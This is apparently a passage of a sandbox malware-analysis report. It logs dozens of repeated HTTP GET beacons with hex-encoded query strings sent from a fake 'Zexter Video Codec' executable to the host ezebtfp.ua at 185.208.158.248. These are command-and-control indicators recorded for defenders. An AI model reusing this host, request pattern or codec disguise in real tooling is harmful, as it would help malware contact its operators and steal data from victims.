                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:36.429343939 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:36 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    34192.168.2.549748185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:36.553056002 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:37.238071918 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:37 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    35192.168.2.549749185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:37.362029076 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:38.061415911 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:37 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:38.168545008 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:38.412102938 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:38 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    36192.168.2.549750185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:38.533473015 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:39.225233078 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    37192.168.2.549751185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:39.346096992 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:40.026340008 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:40.137485027 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:40.389560938 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:40 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:40.496808052 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:40.731971025 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:40 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    38192.168.2.549752185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:40.861183882 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:41.558625937 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:41.671484947 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:41.907891035 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    39192.168.2.549753185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:42.209418058 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:42.892733097 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:42 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    40192.168.2.549754185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:43.018748999 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:43.712949991 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:43 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:43.826062918 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:44.063143969 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:43 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    41192.168.2.549755185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:44.191057920 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:44.974131107 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:44 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    42192.168.2.549756185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:45.495464087 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:46.182421923 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:46 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:46.294872999 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:46.530219078 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:46 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    43192.168.2.549757185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:46.659794092 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:47.354055882 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:47 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    44192.168.2.549758185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:47.502206087 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:48.187638044 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    45192.168.2.549759185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:48.361952066 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:49.043767929 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:49.153165102 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:49.395987988 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:49 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    46192.168.2.549760185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:49.517812014 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:50.227657080 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    47192.168.2.549761185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:50.346549034 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:51.027204990 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:51.137662888 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:51.380590916 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:51 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    48192.168.2.549764185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:51.508207083 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:52.430325031 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:52.430548906 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
